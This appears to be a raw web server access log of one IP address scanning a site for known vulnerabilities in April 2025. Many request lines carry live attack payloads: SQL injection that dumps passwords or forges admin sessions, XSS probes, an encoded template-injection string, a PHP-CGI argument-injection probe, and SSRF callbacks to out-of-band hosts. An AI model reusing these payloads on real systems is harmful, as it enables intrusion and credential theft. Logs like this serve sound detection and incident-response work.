"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240" 154.84.62.234 - - [24/Apr/2025:10:07:27 -0400] "GET /cvnnzwm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0" 154.84.62.234 - - [24/Apr/2025:10:08:38 -0400] "POST /api/v1/snapshots HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" 154.84.62.234 - - [24/Apr/2025:10:09:04 -0400] "POST /api/runscript HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.7.18" 154.84.62.234 - - [24/Apr/2025:10:09:10 -0400] "GET /_images/AOIW0o HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:10:09:20 -0400] "GET /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:10:09:26 -0400] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:10:09:31 -0400] "GET /?rest_route=/wp/v2/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.18" 154.84.62.234 - - [24/Apr/2025:10:09:37 -0400] "GET /feed/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.25" 154.84.62.234 - - [24/Apr/2025:10:09:43 -0400] "GET /author-sitemap.xml HTTP/1.1" 200 119204 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:10:10:04 -0400] "POST /jeecg-boot/jmreport/show HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:10:23 -0400] "GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_7_3; es) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:10:27 -0400] "GET /appliance/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/15.0.0 Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:10:34 -0400] "GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:10:10:38 -0400] "POST /inizio.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.9.17" 154.84.62.234 - - [24/Apr/2025:10:10:43 -0400] "POST /creaprezzi.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:12:58 -0400] "POST /main/webservices/additional_webservices.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:10:13:18 -0400] "GET / HTTP/1.1" 200 0 "-" "python-requests/2.26.0" 154.84.62.234 - - [24/Apr/2025:10:13:19 -0400] "GET /admin?_url=%2Fadmin&date_to='\"><img+src=x+onerror=alert(3)>&date_from='\"><img+src=x+onerror=alert(3)> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:10:13:22 -0400] "POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0" 154.84.62.234 - - [24/Apr/2025:10:13:26 -0400] "POST /guestaccess.aspx HTTP/1.1" 200 0 "-" "python-requests/2.26.0" 154.84.62.234 - - [24/Apr/2025:10:13:34 -0400] "POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1" 200 0 "-" "python-requests/2.26.0" 154.84.62.234 - - [24/Apr/2025:10:14:05 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.25" 154.84.62.234 - - [24/Apr/2025:10:14:10 -0400] "POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:14:39 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.5.16" 154.84.62.234 - - [24/Apr/2025:10:15:02 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:15:27 -0400] "POST / HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.21" 154.84.62.234 - - [24/Apr/2025:10:15:48 -0400] "POST /?PHPRC=/dev/fd/0 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:10:16:09 -0400] "POST /webauth_operation.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:10:16:21 -0400] "POST /loadfile.lp?pageid=Configure HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:16:55 -0400] "POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+IpAddress=%27154.84.62.234%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27%23 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:10:17:12 -0400] "POST /pig/add-pig.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:17:40 -0400] "GET /bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:17:43 -0400] "GET /file-manager/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:10:17:46 -0400] "GET /asyncrenderer/%7B%7Burl%7D%7D?clientId={{id}}&timeout=500&wiki=xwiki HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:17:47 -0400] "POST /file-manager/backend/makefile HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/19.0.0 Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:17:51 -0400] "POST /file-manager/backend/text HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:17:55 -0400] "POST /file-manager/backend/permissions HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:18:00 -0400] "GET /aR8U2yNHqC.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:18:02 -0400] "GET /api/server/version HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:18:07 -0400] "POST /api/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:10:18:33 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:19:00 -0400] "POST /superadmincreate.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:19:34 -0400] "POST /CFIDE/adminapi/base.cfc?method HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.14 (KHTML, like Gecko) Version/17.4.63 Safari/617.14" 154.84.62.234 - fedish264pro [24/Apr/2025:10:20:13 -0400] "GET /b_download/index.html HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4" 154.84.62.234 - fedish265pro [24/Apr/2025:10:20:13 -0400] "GET /b_download/index.html HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/616.20 (KHTML, like Gecko) Version/17.1.83 Safari/616.20" 154.84.62.234 - - [24/Apr/2025:10:20:14 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:20:22 -0400] "GET /keepalive.php?caller=%22%3E%3Cimg+src%3d1+onerror%3dalert(document.domain)+%2F%3E&uq_mt=1664137650.085 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:20:29 -0400] "POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.5.16" 154.84.62.234 - - [24/Apr/2025:10:20:43 -0400] "GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:10:20:43 -0400] "GET /sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/616.19.3 (KHTML, like Gecko) Version/17.6.11 Safari/616.19.3" 154.84.62.234 - - [24/Apr/2025:10:20:43 -0400] "GET /sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" 154.84.62.234 - - [24/Apr/2025:10:20:43 -0400] "GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:21:04 -0400] "GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:10:21:24 -0400] "GET /api/session/properties HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:10:21:27 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.25" 154.84.62.234 - - [24/Apr/2025:10:21:45 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:10:22:14 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:22:43 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.4.21" 154.84.62.234 - - [24/Apr/2025:10:23:27 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0" 154.84.62.234 - - [24/Apr/2025:10:23:34 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:24:14 -0400] "GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:24:34 -0400] "GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1" 200 0 "554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:\"id\";s:49:\"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#\";}" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:24:55 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:25:34 -0400] "GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/616.20.13 (KHTML, like Gecko) Version/17.7.74 Safari/616.20.13" 154.84.62.234 - - [24/Apr/2025:10:26:05 -0400] "POST /modules/miniform/ajax_delete_message.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:10:26:22 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.18" 154.84.62.234 - - [24/Apr/2025:10:26:49 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/616.20 (KHTML, like Gecko) Version/17.1.83 Safari/616.20" 154.84.62.234 - - [24/Apr/2025:10:26:58 -0400] "GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:10:27:31 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:28:38 -0400] "POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:28:49 -0400] "GET /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.23" 154.84.62.234 - - [24/Apr/2025:10:30:15 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:30:28 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:30:40 -0400] "GET /admin/store.php?\"onmouseover='alert(document.domain)'bad=\" HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:30:51 -0400] "POST /api/sys/set_passwd HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:10:31:00 -0400] "GET /lwa/Webpages/LwaClient.aspx?meeturl=aHR0cDovL2QwNHFyN2lqNHBxMTlkNzVrNDkwZXNkcW1pN3dzOWk4cS5vYXN0Lm9ubGluZS8/aWQ9MFNHJTI1ezEzMzcqMTMzN30jLnh4Ly8= HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:31:02 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.19" 154.84.62.234 - - [24/Apr/2025:10:31:30 -0400] "POST /RealGimmWeb/Pages/Sistema/LogObjectTrace.aspx HTTP/1.1" 200 0 "-" "</span><script>alert(document.domain)</script>" 154.84.62.234 - - [24/Apr/2025:10:31:34 -0400] "GET /RealGimmWeb/Pages/ErroreNonGestito.aspx HTTP/1.1" 200 0 "-" "</span><script>alert(document.domain)</script>" 154.84.62.234 - - [24/Apr/2025:10:31:55 -0400] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:32:03 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:32:05 -0400] "GET /main/inc/lib/javascript/bigupload/files/Hv2hCGm432.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:10:32:05 -0400] "POST /opencms/cmisatom/cmis-online/query HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:32:09 -0400] "GET /WebInterface HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:10:32:09 -0400] "POST /cmisatom/cmis-online/query HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:32:20 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362" 154.84.62.234 - - [24/Apr/2025:10:32:50 -0400] "DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:32:55 -0400] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:32:55 -0400] "GET /api/server/version HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:32:58 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.19" 154.84.62.234 - - [24/Apr/2025:10:33:01 -0400] "POST /api/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:10:33:24 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:33:34 -0400] "POST /models?url=http%3a//d04qr7ij4pq19d75k490zpxuhotqcwarp.oast.online HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:33:37 -0400] "POST /geoserver/wms HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:33:37 -0400] "POST /wms HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.20" 154.84.62.234 - - [24/Apr/2025:10:33:45 -0400] "GET /hoteldruid/inizio.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:33:54 -0400] "POST /api/sys/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:35:49 -0400] "POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:36:02 -0400] "POST /wp-job-portal-jobseeker-controlpanel/jobs HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:36:41 -0400] "GET / HTTP/1.1" 200 0 